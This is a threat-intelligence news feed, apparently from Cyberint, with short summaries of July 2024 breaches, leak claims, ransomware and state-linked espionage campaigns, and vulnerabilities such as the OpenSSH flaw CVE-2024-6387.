news

Breaking Cyber News From Cyberint

Breaking news feed of the latest cyber incidents, breaches, vulnerabilities, malware, ransomware and so much more.

  • Jul 15, 2024

    • Handala
    • Sheba Medical Center
    • exclusive
    • Middle East
    • Israel
    • Innovalve Bio Medical Ltd.
    • Asia

    'Handala' has claimed responsibility for an attack against 'Sheba Medical Center'

    The Pro-Palestinian threat actor group "Handala" has claimed responsibility for breaching the Israeli hospital "Sheba Medical Center" as part of their "OPIsrael" campaign. The group claims to have access to every department but has initially focused on the "Heart Department of Sheba and Innovalve Bio Medical Ltd" as a warning. They have released 50GB of sample data, which allegedly includes medical and personal information of the company's clients, agreements, staff details, and financial documents, and according to their statement, they plan to release a total of 5TB of company information.

  • Jul 15, 2024

    • Sportclick
    • exclusive
    • Brazil
    • Chucky
    • Media
    • Latin America And The Caribbean

    Threat Actor Chucky leaked a database potentially related to SportClick Brazil's clients

    The threat actor Chucky leaked on the leakbase[.]io forum database potentially related to 628K clients of the Brazilian site sportclick.com.br. The exposed information includes sensitive client information such as user id, names, email, password, etc.

  • Jul 15, 2024

    • Mustang Panda
    • spyware
    • Greece
    • Netherlands
    • China
    • Norway

    Cyberattack Targets European Maritime Industry: Mustang Panda Suspected

    A coordinated cyberespionage campaign has targeted European shipping companies, including Norwegian, Greek, and Dutch vessels. The attacks involved USB drives loaded with malware, aiming to steal sensitive information. Experts attribute the campaign to the China-affiliated hacker group Mustang Panda, known for using the Korplug malware in previous cyberattacks. This marks the first time a China-linked group has focused on commercial shipping. The Norwegian Coastal Administration suggests the attackers sought insights into the maritime sector. There may be unreported incidents, highlighting the need for increased vigilance.

  • Jul 15, 2024

    • Belgium
    • Nato
    • Europe

    NATO Allies Establish Integrated Cyber Defence Centre in Belgium

    NATO has agreed to establish the NATO Integrated Cyber Defence Centre (NICC) at its strategic military headquarters in SHAPE, Belgium. This initiative, decided during the summit on July 10, 2024, aims to enhance NATO and Allied network security, improve situational awareness in cyberspace, and strengthen collective resilience against sophisticated cyber threats.

  • Jul 15, 2024

    • United Kingdom
    • Europe
    • Business Services
    • Mspy

    Hacktivists gained access to a spyware maker's database, publishing millions of users information online

    In May 2024, mSpy, a spyware maker, fell victim to a data breach when Hacktivists obtained and published online 142GB of user data and support tickets. The data included 2.4 million unique email addresses, IPs, names, and photos, largely comprised of support tickets seeking assistance in installing the spyware.

  • Jul 15, 2024

    • At&T Wireless
    • North America
    • Telecommunications
    • United States

    AT&T falls victim to a data breach following Snowflake attacks exposing over 100 million customers

    In April 2024, AT&T, a U.S.-based telecommunications company, fell victim to a data breach when threat actors gained access to a Snowflake account and stole the call logs of nearly 110 million customers. the data included customers' phone numbers, and phone numbers of those interacted with by the customers.

  • Jul 11, 2024

    • exclusive
    • Energy
    • Middle East
    • Israel
    • Sonol
    • Asia
    • Handala

    'Handala Hack' Targets Israeli Energy Company 'Sonol'

    The hacker group "Handala Hack" has announced a breach of the Israeli energy company "Sonol" as part of the OPIsrael campaign. The group claims to have obtained 54GB of internal company data and has released a sample of the allegedly stolen information, including details about clients and their activities in the company's branches.

  • Jul 11, 2024

    • Energy
    • exclusive
    • Mexico
    • Pemex
    • Latin America And The Caribbean
    • Panchovilla

    PanchoVilla claims to have compromised a server of the Mexican Oil Company (PEMEX)

    On July 8th, the threat actor Pancho Villa published on the cybercrime forum breachforums that he compromised a server of the Mexican Oil Company (Pemex), obtaining over 50 databases. additionally, a sample screenshot was provided. The threat actor is selling the database at $1,000 USD

  • Jul 11, 2024

    • arrest
    • South-Eastern Asia
    • National Bureau Of Investigation (Nbi)
    • Asia
    • Philippines

    Four Members of Blood Security Hackers Apprehended in an Entrapment Operation by National Bureau of Investigation (NBI)

    On July 10, 2024, National Bureau of Investigation (NBI) released a press statement regarding the arrest of four "Blood Security Hackers" members - namely: - Eden Glenn Petilo y Oñez - Carlo Reyna y Placido - John Kenneth Macarampat - Leonel Obina y Laraga These threat actors were responsible for past cyber intrusions, including, but not limited to, the COMELEC and Sky Cable Data breaches. They are also notorious in terms of illegal carding activities in the past.

  • Jul 10, 2024

    • Finance
    • Latin America And The Caribbean
    • Mekotio

    Mekotio Banking Trojan Targeting Latin America

    Mekotio malware, a banking trojan, has made a comeback in recent weeks and was witnessed targeting financial organizations within Latin America.

  • Jul 08, 2024

    • Dragonforce
    • exclusive

    DragonForce Outlines Requirements for New RaaS Partners

    DragonForce is extending an invitation to specialists from various fields, including access experts and pentesters, to join their team. They offer an infrastructure and tools, retaining only 20% of income while partners keep 80%. In their last post, DragonForce emphasizes the importance of carefully selecting candidates for their Ransomware-as-a-Service (RaaS). Prospective partners are required to prepare a target with an income of at least $5,000,000 and provide detailed information about their ZoomInfo target. Files matching the provided ZoomInfo must be uploaded to a convenient storage location, such as mega.co.nz or SSH. To ensure a smooth process, DragonForce advises candidates to contact them in advance to agree on all details, facilitating faster access to their RaaS.

  • Jul 08, 2024

    • Global
    • exclusive

    Massive RockYou2024 Password List Allegedly Leaked with Nearly 10 Billion Entries

    A threat actor claims to have leaked a new version of the infamous RockYou password list, dubbed RockYou2024. This updated compilation reportedly includes over 9.9 billion passwords, making it one of the largest collections of compromised credentials to date. According to the threat actor, RockYou2024 builds on the previous RockYou21 list, aggregating data from numerous recent database leaks shared across various forums over the years. This enormous compilation presents a significant security risk, providing cybercriminals with an extensive repository of passwords for credential stuffing and other malicious activities. The original RockYou list, exposed in 2009 after a breach at RockYou.com, contained 32 million passwords and has since been a crucial tool for hackers, inspiring several expanded versions as new breaches emerged.

  • Jul 07, 2024

    • crypto
    • global
    • malware

    Ethereum mailing list breach exposes 35,000 to crypto draining attack

    A threat actor compromised Ethereum's mailing list provider, sending phishing emails to over 35,000 addresses with a link to a malicious site running a crypto drainer. Ethereum disclosed the incident in a blog post, confirming no material impact on users. The attack occurred on June 23, using the email address ‘updates@blog.ethereum.org,’ and targeted 35,794 addresses with a fake promotion offering a 6.8% APY on staked Ethereum. Recipients were directed to a professionally crafted, malicious website that drained wallets if users connected and signed the transaction. Ethereum's internal security team quickly blocked further emails, alerted the community, and ensured the malicious link was blocked by Web3 wallet providers and Cloudflare. No recipients were affected, and Ethereum has since migrated some email services to prevent future incidents.

  • Jul 07, 2024

    • Ticketmaster
    • Retail
    • North America
    • United States

    Threat actors Leak Taylor Swift Ticket Data, Demand $2 Million Extortion

    Threat actors have leaked barcode data for 166,000 Taylor Swift Eras Tour tickets, threatening to release more if a $2 million extortion demand is not met. In May, the threat actor ShinyHunters began selling data on 560 million Ticketmaster customers for $500,000, which was confirmed to be from Ticketmaster’s account on Snowflake, a cloud-based data warehousing company. The breach, starting in April, involved hackers downloading Snowflake databases from at least 165 organizations using stolen credentials, then blackmailing companies for payments. Confirmed victims include Neiman Marcus, Los Angeles Unified School District, and Advance Auto Parts. The latest leak by Sp1d3rHunters includes ticket data for Taylor Swift concerts in Miami, New Orleans, and Indianapolis, with a threat to leak data from other events if the ransom isn't paid. Ticketmaster clarified that unique barcodes are refreshed every few seconds, making the stolen tickets unusable. They also confirmed they did not negotiate with the threat actors, countering ShinyHunters' claims of being offered $1 million to delete the data.

  • Jul 07, 2024

    • Global
    • North America
    • United States
    • Authy
    • Business Services

    Twilio Secures Authy Endpoint After Breach Exposes 33 Million Phone Numbers

    Cloud communications provider Twilio has disclosed that unidentified threat actors exploited an unauthenticated endpoint in Authy, exposing data associated with Authy accounts, including users' cell phone numbers. In response, Twilio secured the endpoint to prevent further unauthorized access. This revelation follows a breach by the online persona ShinyHunters (Which we exposed exclusively), who published a database containing 33 million phone numbers from Authy accounts on BreachForums. Authy, a popular two-factor authentication (2FA) app owned by Twilio, adds an extra layer of security to accounts. Twilio assured users that there is no evidence of the threat actors accessing Twilio's systems or other sensitive data. However, they recommend that users update their Authy apps to the latest versions and remain vigilant against potential phishing and smishing attacks using their phone numbers.

  • Jul 07, 2024

    • global
    • supplychain

    Widespread Polyfill.io Supply Chain Attack Affects Over 380,000 Hosts, Including Major Companies

    The supply chain attack on the Polyfill[.]io JavaScript library is more extensive than initially believed, affecting over 380,000 hosts, including prominent companies like WarnerBros, Hulu, Mercedes-Benz, and Pearson. New findings from Censys reveal that these hosts are embedding scripts from the malicious domain as of July 2, 2024, with many located within the Hetzner network in Germany. The attack, which emerged in late June 2024, involves code modifications that redirect users to adult- and gambling-themed websites at specific times. The domain, sold to Chinese company Funnull in February 2024, has since been suspended by Namecheap, with further mitigation efforts from Cloudflare and Google. The attackers attempted to relaunch the service under different domains, with one still active. A broader network of potentially related malicious domains has also been uncovered, suggesting this incident is part of a larger campaign. WordPress security firm Patchstack has warned of cascading risks to sites using legitimate plugins linked to the rogue domain.

  • Jul 04, 2024

    • Cve-2021-40444
    • CVE-2021-40444
    • Microsoft Mshtml
    • Mshtml

    Threat Actors Exploit MSHTML Flaw to Deploy MerkSpy Surveillance Tool in Targeted Campaigns

    Unknown threat actors have been exploiting a patched security flaw in Microsoft MSHTML to deliver a surveillance tool called MerkSpy, targeting users in Canada, India, Poland, and the U.S. The attack begins with a Microsoft Word document disguised as a job description for a software engineer. Opening the document triggers CVE-2021-40444, a high-severity flaw in MSHTML, allowing remote code execution. This leads to the download of an HTML file, which executes shellcode to download and run further malicious payloads, including MerkSpy. MerkSpy establishes persistence on the compromised system through Windows Registry changes and captures sensitive information such as screenshots, keystrokes, login credentials, and data from the MetaMask browser extension. This data is then transmitted to an external server controlled by the attackers. In parallel, Symantec reported a smishing campaign in the U.S., where users receive SMS messages purportedly from Apple, directing them to bogus credential-harvesting pages. This malicious website includes a CAPTCHA to appear legitimate and mimics an outdated iCloud login template.

  • Jul 04, 2024

    • global
    • arrest

    Global Police Operation Shuts Down 600 Cybercrime Servers and arrests 54 individuals

    A coordinated law enforcement operation named MORPHEUS has dismantled nearly 600 servers used by cybercriminal groups associated with Cobalt Strike, a red teaming framework. The crackdown, led by the UK National Crime Agency and involving multiple international authorities, targeted older, unlicensed versions of Cobalt Strike between June 24 and 28. Of the 690 flagged IP addresses, 590 are no longer accessible. While Cobalt Strike is a legitimate tool for IT security, cracked versions have been misused by malicious actors for post-exploitation purposes, significantly lowering the barrier to cybercrime. In parallel, Spanish and Portuguese authorities arrested 54 individuals involved in vishing schemes targeting elderly citizens, resulting in €2,500,000 in losses. The fraudsters posed as bank employees to extract personal information and subsequently pressured victims into handing over their credit cards and bank details. The stolen funds were funneled through a sophisticated money laundering network. Additionally, INTERPOL dismantled human trafficking rings and disrupted global online scam networks, seizing $257 million in assets and arresting nearly 4,000 suspects across 61 countries in Operation First Light.

  • Jul 03, 2024

    • Intelbroker
    • North America
    • United States
    • Cognizant
    • Business Services

    Threat Actor "IntelBroker" Allegedly Breached Cognizant, Extracting 12 Million Records

    In June 2024, a threat actor named "IntelBroker" claimed to have breached Cognizant, an IT solutions provider, and to have gained access to its Oracle Insurance Policy Administration database. According to the threat actor, 12 million records belonging to approximately 40 thousand users were exposed including policy numbers, client names, and client companies among others.

  • Jul 03, 2024

    • Canada
    • 888
    • Shopify
    • North America
    • Business Services

    Threat Actor Allegedly Breached Shopify, Extracting User Information

    In July 2024, a threat actor named "888" claimed to have breached Shopify, a Canada-based multinational eCommerce Platform, and to have gained access to a database. According to the threat actor, nearly 180 thousand customer records were taken including names, email addresses, phone numbers, orders made, total spent, and email / SMS subscription details. The threat actor has offered the dataset for sale.

  • Jul 02, 2024

    • Cve-2024-6387
    • Remote Services
    • CVE-2024-6387 - RCE Vulnerability in OpenSSH
    • CVE-2024-6387

    CVE-2024-6387 - RCE Vulnerability in OpenSSH

    A critical remote code execution (RCE) vulnerability, CVE-2024-6387, has been discovered in OpenSSH’s server by the Qualys research team. This vulnerability reintroduces an issue previously addressed in 2006, highlighting persistent security challenges in widely-used software. Despite the difficulty of exploiting this flaw, its severity is underscored by its potential impact on systems that use SSH, particularly for accessing Kubernetes nodes. No successful remote attacks have been reported yet, but the vulnerability's presence emphasizes the importance of ongoing vigilance and prompt system updates. The CVE-2024-6387 vulnerability arises from a signal handler race condition in OpenSSH’s default configuration. If an SSH client fails to authenticate within the default LoginGraceTime of 120 seconds, the SIGALRM handler is called, potentially leading to heap corruption and arbitrary code execution with root privileges. While widespread exploitation is considered unlikely due to the need for distribution-specific conditions and extensive login attempts, the risk remains significant. Organizations are urged to upgrade to the latest OpenSSH release and consider temporary workarounds, such as setting LoginGraceTime to 0, to protect their systems from potential attacks.

  • Jul 01, 2024

    • Chrome
    • Cve-2017-11882
    • Education
    • Office
    • South Korea
    • Apt43
    • CVE-2017-11882
    • Eastern Asia
    • Asia

    Kimsuky Using TRANSLATEXT Chrome Extension to Steal Sensitive Data

    The North Korea-linked threat actor Kimsuky has been linked to a new malicious Google Chrome extension designed to steal sensitive information as part of an ongoing intelligence collection effort. Observed in early March 2024 and codenamed TRANSLATEXT, the extension is capable of gathering email addresses, usernames, passwords, cookies, and browser screenshots. This targeted campaign focuses on South Korean academia, specifically those involved in North Korean political affairs. The initial access method for this activity remains unclear, though Kimsuky is known for using spear-phishing and social engineering attacks to initiate infection. The attack begins with a ZIP archive, allegedly related to Korean military history, containing a Hangul Word Processor document and an executable file. Executing the file retrieves a PowerShell script from an attacker-controlled server, which exports information about the compromised victim to a GitHub repository and downloads additional PowerShell code via a Windows shortcut (LNK) file. Researchers found a GitHub account, created on February 13, 2024, briefly hosting the TRANSLATEXT extension under the name "GoogleTranslate.crx," although the delivery method remains unknown. TRANSLATEXT, disguised as Google Translate, uses JavaScript code to bypass security measures for services like Google, Kakao, and Naver; steal email addresses, credentials, and cookies; capture browser screenshots; and exfiltrate stolen data. It also fetches commands from a Blogger Blogspot URL to take screenshots of newly opened tabs and delete all cookies from the browser.

  • Jul 01, 2024

    • Germany
    • Redline Stealer
    • Canada
    • Middle East
    • Mystic Stealer
    • Risepro
    • Eastern Europe
    • Asia
    • India
    • Turkey
    • North America
    • Smoke Loader
    • Southern Asia
    • Amadey
    • Western Europe
    • Europe
    • Russia
    • Enigma Loader
    • United States
    • Unfurling Hemlock

    New Unfurling Hemlock threat actor floods systems with malware

    A threat actor known as **Unfurling Hemlock** has been conducting large-scale malware campaigns, infecting target systems with up to ten different types of malware simultaneously. Security researchers have identified this method as a "malware cluster bomb," where one malware sample spreads additional malicious software on the compromised machine. The malware types include information stealers, botnets, and backdoors. The operation, active since at least February 2023, uses a distinct distribution method involving nested compressed files within a malicious executable named 'WEXTRACT.EXE'. This file arrives via malicious emails or malware loaders and unpacks multiple malware variants in reverse order on the victim's machine. Over 50,000 such "cluster bomb" files have been linked to Unfurling Hemlock, with the majority of attacks targeting systems in the United States, Germany, Russia, Turkey, India, and Canada. Unfurling Hemlock's strategy of deploying multiple payloads provides high redundancy, enhancing persistence and monetization opportunities despite the risk of detection. The malware observed includes Redline, RisePro, Mystic Stealer, Amadey, SmokeLoader, protection disablers, and various utilities for disabling security features and obfuscating malware payloads. The group's activities suggest they may sell info-stealer logs and initial access to other threat actors. Based on linguistic evidence and the use of specific hosting services, researchers believe Unfurling Hemlock operates from an Eastern European country.

  • Jun 30, 2024

    • Cve-2024-5806
    • CVE-2024-5806

    Exploit Attempts Recorded Against New MOVEit Transfer Vulnerability

    A critical security flaw in Progress Software's MOVEit Transfer, identified as CVE-2024-5806 with a CVSS score of 9.1, is already seeing exploitation attempts following its public disclosure. The flaw involves an authentication bypass in specific versions of MOVEit Transfer, potentially allowing attackers to impersonate any user on the server. Another related vulnerability, CVE-2024-5805, also affects MOVEit Gateway version 2024.0.0. watchTowr Labs highlighted that CVE-2024-5806 comprises two separate issues, one in MOVEit and the other in the IPWorks SSH library. Progress Software has advised users to block public RDP access to MOVEit servers and limit outbound access to trusted endpoints to mitigate these vulnerabilities. exploiting CVE-2024-5806 requires knowledge of an existing username, remote authentication capability, and public accessibility of the SFTP service. Censys data shows around 2,700 MOVEit Transfer instances online, mostly in the U.S., U.K., Germany, and other countries. The urgency of updating to the latest versions is emphasized, especially after similar vulnerabilities led to widespread Cl0p ransomware attacks last year. Meanwhile, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) reported an intrusion into its Chemical Security Assessment Tool (CSAT) due to flaws in the Ivanti Connect Secure appliance. Although no data exfiltration was detected, the agency warned of potential unauthorized access to sensitive information. Progress Software confirmed the vulnerabilities have been fixed and stated there have been no reports of exploitation or direct operational impact on customers.

  • Jun 30, 2024

    • Finance
    • exclusive
    • Credright
    • Southern Asia
    • Asia
    • India

    Threat Actor Allegedly Leaks 70 GB of KYC Data from CredRight

    A threat actor has claimed to have leaked data from CredRight, a data-driven lending platform that provides credit to micro, small, and medium enterprises through NBFCs and banks. CredRight streamlines the loan application process by allowing users to register online, upload necessary documents, and apply for loans quickly. The threat actor manages different accounts on the dark web forums, and posted them in two different underground forums. The alleged breach includes 70 GB of KYC (Know Your Customer) documents, comprising photos, videos, and voice recordings. This leak could potentially expose sensitive personal and financial information of numerous CredRight users, raising significant security and privacy concerns for the affected individuals and the platform.

  • Jun 30, 2024

    • Finance
    • Neiman Marcus
    • exclusive
    • North America
    • United States

    ShinyHunters group leaks Data from Neiman Marcus

    According to a post on a dark web forum, a threat actor has shared data purportedly from Neiman Marcus. The post claims that the alleged leak includes account balances, browser user agent details, credit cards, dates of birth, email addresses, gift cards, IP addresses, names, payment histories, payment methods, phone numbers, and physical addresses. The threat actor also mentioned that Neiman Marcus refused to pay the ransom.

  • Jun 30, 2024

    • Cve-2023-21839
    • 8220 Gang
    • CVE-2023-21839
    • K4Spreader
    • Cve-2017-10271
    • Purecrypter
    • CVE-2017-10271
    • Tsunami
    • Cve-2017-3506
    • Weblogic Server
    • CVE-2017-3506

    8220 Gang Exploits Oracle WebLogic Server Flaws

    Security researchers have uncovered more details about the 8220 Gang's cryptocurrency mining operation, which exploits known security flaws in Oracle WebLogic Server. Researchers revealed that the threat actor, tracked as Water Sigbin, uses fileless execution techniques such as DLL reflective and process injection to avoid disk-based detection. Water Sigbin exploits vulnerabilities like CVE-2017-3506, CVE-2017-10271, and CVE-2023-21839 to gain initial access and deploy the miner payload via a multi-stage loading technique. The attack sequence involves deploying a PowerShell script to drop a first-stage loader, which then launches another binary in memory. This binary serves as a conduit for the PureCrypter loader, which exfiltrates hardware information and creates scheduled tasks to run the miner while evading Microsoft Defender Antivirus. Further developments include the use of a new installer tool called k4spreader, which the 8220 Gang has been using since at least February 2024. This tool delivers the Tsunami DDoS botnet and the PwnRig mining program, leveraging security flaws in Apache Hadoop YARN, JBoss, and Oracle WebLogic Server to infiltrate targets. Written in cgo, k4spreader ensures system persistence, self-updates, and executes other malware while disabling firewalls and terminating rival botnets. The QiAnXin XLab team has detailed this tool, highlighting its capabilities and ongoing development.

  • Jun 24, 2024

    • Sub-Saharan Africa
    • Apt31
    • Taiwan
    • Hong Kong
    • South Korea
    • Kenya
    • Djibouti
    • Rwanda
    • Eastern Asia
    • Malaysia
    • Asia
    • Philippines

    Flax Typhoon Cyber Espionage Campaign Hits 75 Taiwanese Organizations

    A likely China-linked state-sponsored threat actor, tracked as RedJuliett, has been linked to a cyber espionage campaign targeting government, academic, technology, and diplomatic organizations in Taiwan between November 2023 and April 2024. RedJuliett, also known as Flax Typhoon and Ethereal Panda, operates from Fuzhou, China, and supports Beijing's intelligence collection goals related to East Asia. The campaign has targeted 24 organizations, including government agencies in Taiwan, Laos, Kenya, and Rwanda, and at least 75 Taiwanese entities for broader reconnaissance and exploitation. RedJuliett employs tactics such as exploiting internet-facing appliances, SQL injection, and directory traversal attacks to gain initial access. They use open-source software like SoftEther for tunneling malicious traffic and living-off-the-land (LotL) techniques to avoid detection. The group's operations include using web shells like China Chopper, devilzShell, AntSword, and Godzilla, and exploiting Linux vulnerabilities such as DirtyCow (CVE-2016-5195). RedJuliett's interest likely lies in gathering intelligence on Taiwan's economic policy, trade, and diplomatic relations. Their focus on internet-facing devices highlights the limited visibility and security of these devices, making them effective targets for initial access.

  • Jun 24, 2024

    • Ratel
    • Donot Team

    Ratel RAT targets outdated Android phones in ransomware attacks

    The open-source Android malware 'Ratel RAT' is being widely deployed by cybercriminals to attack outdated devices, often locking them down with a ransomware module that demands payment via Telegram. Researchers detected over 120 campaigns using Ratel RAT, with known threat actors such as APT-C-35 (DoNot Team) involved, and origins traced to Iran and Pakistan. High-profile targets include government and military organizations, mainly in the United States, China, and Indonesia. Most infected devices run end-of-life Android versions (11 and older), which no longer receive security updates, making them particularly vulnerable. Ratel RAT is spread through fake apps mimicking popular brands like Instagram and WhatsApp, tricking users into downloading malicious APKs. During installation, it requests risky permissions to run in the background. The malware supports various commands, including file encryption (ransomware), file deletion, screen locking, SMS and location tracking. In roughly 10% of cases analyzed by Check Point, the ransomware command was issued. To defend against these attacks, users should avoid downloading APKs from untrusted sources, refrain from clicking on suspicious links, and use Play Protect to scan apps before launching them.

  • Jun 23, 2024

    • Sugargh0St
    • Middle East
    • Government
    • Turkmenistan
    • Sneakychef
    • Mining
    • Asia
    • India
    • Spicerat
    • Saudi Arabia
    • Telecommunications
    • Southern Asia
    • Sub-Saharan Africa
    • Northern Europe
    • Europe
    • Angola
    • Central Asia
    • Latvia
    • Africa

    Chinese Threat Actors Deploy SpiceRAT and SugarGh0st in Global Espionage Campaign (Operation Diplomatic Specter)

    Since August 2023, a previously undocumented Chinese-speaking threat actor codenamed SneakyChef, has been linked to an espionage campaign primarily targeting government entities across Asia, Europe, the Middle East, and Africa with the SugarGh0st malware. SneakyChef uses lures resembling scanned documents from government agencies, focusing on Ministries of Foreign Affairs and embassies. In addition, The same malware that was used in this campaign is likely to focus on various government entities across Angola, India, Latvia, Saudi Arabia, and Turkmenistan based on the lure documents used in the spear-phishing campaigns, indicating a widening of the scope of the countries targeted. The campaign, also tracked as Operation Diplomatic Specter, has targeted government, IT, metallurgy, mining, and telecommunications sectors. SneakyChef utilizes sophisticated tactics, including supply chain attacks and deploying new malware like SpiceRAT, which employs DLL side-loading techniques for evasion and persistence. This underscores the growing threats from advanced persistent threat actors targeting critical infrastructure globally.

  • Jun 23, 2024

    • Finance
    • exclusive
    • North America
    • United States
    • T-Mobile Us

    IntelBroker Breached into a giant telecom vendor

    The threat actor IntelBroker has allegedly leaked data from telecommunications giant T-Mobile. The compromised information reportedly includes source code, SQL files, images, terraform data, certifications, and siloprograms. IntelBroker shared several images of the leaked data but did not specify a price, inviting interested buyers to message them with offers. The threat actor advised against messages from users without rank or reputation. Payments are only accepted in Monero (XMR).

  • Jun 23, 2024

    • exclusive
    • Europe
    • Northern Europe
    • Retail
    • Ireland

    Threat Actor Claims to Sell Unauthorized Access to Major Irish Retailer

    A threat actor has recently surfaced, claiming to sell unauthorized access to the network of a major Irish retailer with annual revenue exceeding $500 million. This access, categorized as AnyConnect (AD), could grant significant control over the retailer's network infrastructure. Priced at $800, the access details and verification are provided only to reputable users, old users, or those with a deposit or premium status on their platform. This restricted sharing ensures the access remains secure and maintains trust within their dealings.

  • Jun 19, 2024

    • Technology
    • Global
    • Intelbroker
    • Apple
    • North America
    • United States

    Threat Actor "IntelBroker" Allegedly Breached Apple, Gaining Access to Internal Source Code

    In June 2024, a threat actor named "IntelBroker" claimed to have breached Apple, a multinational technology company, and to have gained access to internal source code. According to the threat actor, three commonly used tools from Apple's internal site were compromised, named AppleConnect-SSO, Apple-HWE-Confluence-Advanced, and AppleMacroPlugin.

  • Jun 18, 2024

    • Technology
    • Advanced Micro Devices (Amd)
    • Intelbroker
    • North America
    • United States

    Threat Actor "IntelBroker" Allegedly Breached AMD, Gaining Access To Databases, Source Code And Future Products

    In June 2024, a threat actor named "IntelBroker" claimed to have breached AMD, an international semiconductor and electronics manufacturer, and to have gained access to its systems. According to the threat actor, future products, specification sheets, employee and customer databases, property files, ROMs, source code, firmware, and finance information were compromised. The threat actor has offered the data for sale.

  • Jun 17, 2024

    • Ph1Ns
    • South-Eastern Asia
    • Philippine National Police (Pnp)
    • Asia
    • Business Services
    • Philippines

    Philippine National Police (PNP) suffered multiple data breaches - May 2024

    In May 2024, the Philippine National Police (PNP) suffered multiple data breaches. These breaches exposed a massive amount of sensitive data affecting not only PNP officers but also Philippine citizens — including high-ranking individuals such as the Philippine President, Vice President, House Speaker, some senators, and many more. The attacks were mainly performed by a threat actor dubbed “PH1NS” — a well-known hacker in the Philippine Threat Landscape — who is also the one behind the recent DOST breach in April 2024.

  • Jun 16, 2024

    • Asia
    • South-Eastern Asia
    • Philippine Statistics Authority
    • Philippines

    Philippine Statistics Authority Leak

    On October 2023, a local threat group that Cyberint had been monitoring leaked files allegedly owned by the Philippine Statistics Authority. As of this writing, the post and the social media Page of the Threat Actor have been taken down, but Cyberint was able to obtain the files from the supposed leak of PSA. According to the Threat Group, the total number of leaked records from the database is 42 billion, and after further checking and downloading the leaked files, the total file size of the leak is 2.1GB and 3,358 total files. The Threat Group uploaded the whole leak on separate “Anonymous” pages, but Cyberint was able to download the full leak on a Google Drive Link provided by the Threat Group. Analysis of some of the leaked files confirmed that the files contain PSA data, such as Certification Passes on the ongoing project of PSA for the “Community-Based Monitoring System” being deployed on all the LGUs in the Philippines. Some of the analyzed files contain more PII, such as local barangay officials' and residents' data.

  • Jun 16, 2024

    • Mustang Panda
    • South-Eastern Asia
    • Philippine Government
    • Government
    • Asia
    • Philippines

    ShapeSocial Media Advertisements Being Leveraged For Fraudulent/Malicious Activity by Mustang Panda

    # Introduction The relationship between China and the Philippines has experienced significant strain in recent months. Early in August, a Chinese Coast Guard ship fired its water cannon at a Philippine vessel carrying supplies to the contested Second Thomas Shoal in the Spratly Islands. In response, the Philippines has announced plans for joint patrols with the United States and naval exercises with Australia. Additionally, it has been reported that the Philippine Coast Guard has ended communication with its Chinese counterparts and removed Chinese barriers erected near the disputed Scarborough Shoal. Concurrently with these real-world events, research shows Mustang Panda had three cyber espionage campaigns in August. These campaigns are believed to have targeted entities in the South Pacific, including the Philippine government. The campaigns utilized legitimate software such as Solid PDF Creator and SmadavProtect, an Indonesian antivirus solution, to execute malicious files onto target systems. The threat actors also devised a clever approach of cloaking the malware's command and control communications to mimic legitimate Microsoft traffic. Mustang Panda is a Chinese advanced persistent threat (APT) group that has been operating since at least 2012. The group is believed to be affiliated with the Chinese government and has been linked to a number of cyberespionage campaigns targeting government entities, nonprofits, and other organizations in North America, Europe, and Asia. On August 1, 2023, it was observed that a Mustang Panda malware package was hosted for download on Google Drive. The threat actors had disguised the malware package as a ZIP file named 230728 meeting minutes.zip. Upon opening the extracted folder, victims are presented with an application named "20230728 meeting minutes.exe" bearing a PDF icon. This file is a renamed copy of the legitimate Solid PDF Creator software. However, unbeknownst to the victims, the folder also contains a hidden file named "SolidPDFCreator.dll." Executing the seemingly harmless "20230728 meeting minutes.exe" triggers the side-loading of the malicious DLL residing in the same folder. Once loaded, the malicious DLL communicates with 45.121.146[.]113 to establish a command-and-control (C2) connection. Our assessment indicates that an entity affiliated with the Philippine government encountered this initial malware package as early as August 1, 2023. The third campaign, created on August 16, 2023, mirrors the structure of the first campaign. However, the ZIP and EXE filenames differ, with the third campaign using "Labour Statement.zip" instead of "230728 meeting minutes.zip" from the first instance. Upon extracting the ZIP file's contents, victims encounter two files. The first file, "Labour Statement.exe," is a harmless copy of the Solid PDF Creator software. The second file, identified as "SolidPDFCreator.dll," harbors malicious intent. Executing the seemingly innocuous "Labour Statement.exe" triggers loading the malicious DLL residing in the same folder. Subsequently, the malicious DLL establishes a connection with 45.121.146[.]113, mirroring the command-and-control (C2) communication pattern observed in the previous two campaigns.

  • Jun 16, 2024

    • Finance
    • exclusive
    • Development Bank Of The Philippines
    • South-Eastern Asia
    • Asia
    • Philippines

    Asia United Bank and Development Bank of the Philippines Leak

    Recently, two Local Banks, namely Asia United Bank and Development Bank of the Philippines, have been mentioned in two separate alleged compromises. This is a notable event compared to the trend of customer phishing that is regularly seen in the banking industry of the Philippines. It is rare to see threat actors targeting the banks themselves instead of their customers – which is usually the easiest and the more financially rewarding crime. Cyberint conducted a HUMINT procedure to try and obtain this leaked data for analysis but to no avail. Investigation into the threat actors and the samples available yielded some insights that can be of value to other banks.

  • Jun 16, 2024

    • Cl0P
    • Bridgeway Communication System
    • exclusive
    • Cve-2023-0669
    • Philippines
    • South-Eastern Asia
    • Telecommunications
    • Communications
    • Goanywhere Mft
    • Asia
    • CVE-2023-0669

    ICT solutions provider Bridgeway Attacked by Cl0p Ransomware Group

    In March 2023, the Cl0p ransomware group claimed they stole data from companies by exploiting a zero-day vulnerability in the GoAnywhere MFT secure file-sharing solution. The list of recent victims of the Clop ransomware group includes the local health care provider Intellicare and the ICT solutions provider Bridgeway. The zero-day vulnerability in GoAnywhere MFT that was exploited by Cl0p ransomware group is now called CVE-2023-0669. The developers of GoAnywhere MFT warned customers in February that a zero-day remote code execution vulnerability was being exploited on exposed admin consoles. GoAnywhere MFT is a secure web transfer solution which allows companies to securely transfer encrypted files with partners while keeping detailed audit logs of who accessed the files.

  • Jun 15, 2024

    • Noname057(16)
    • Technology
    • Botnet
    • exclusive
    • Canada
    • Usersec
    • North America
    • Telecommunications
    • Web Ddos
    • Network Denial Of Service

    NoName057(16) and UserSec Allegedly Attacked Canada

    Threat actors posted messages about attacks on several Canadian organizations on their Telegram channels. NoName057(16) announced their collaboration with UserSec to target Canada's internet infrastructure, allegedly taking down multiple websites. UserSec claimed they launched a large-scale attack on major Canadian provider Telus Corp. At the same time, NoName057(16) stated they attacked the Canadian Radio-Television and Telecommunications Commission and Investment Quebec, a government corporation. The messages included hashtags expressing their hostility towards NATO and Canada.

  • Jun 15, 2024

    • United Kingdom
    • Europe
    • Health Services
    • Healthcare
    • Qilin

    London hospitals cancel over 800 operations after Qilin ransomware attack

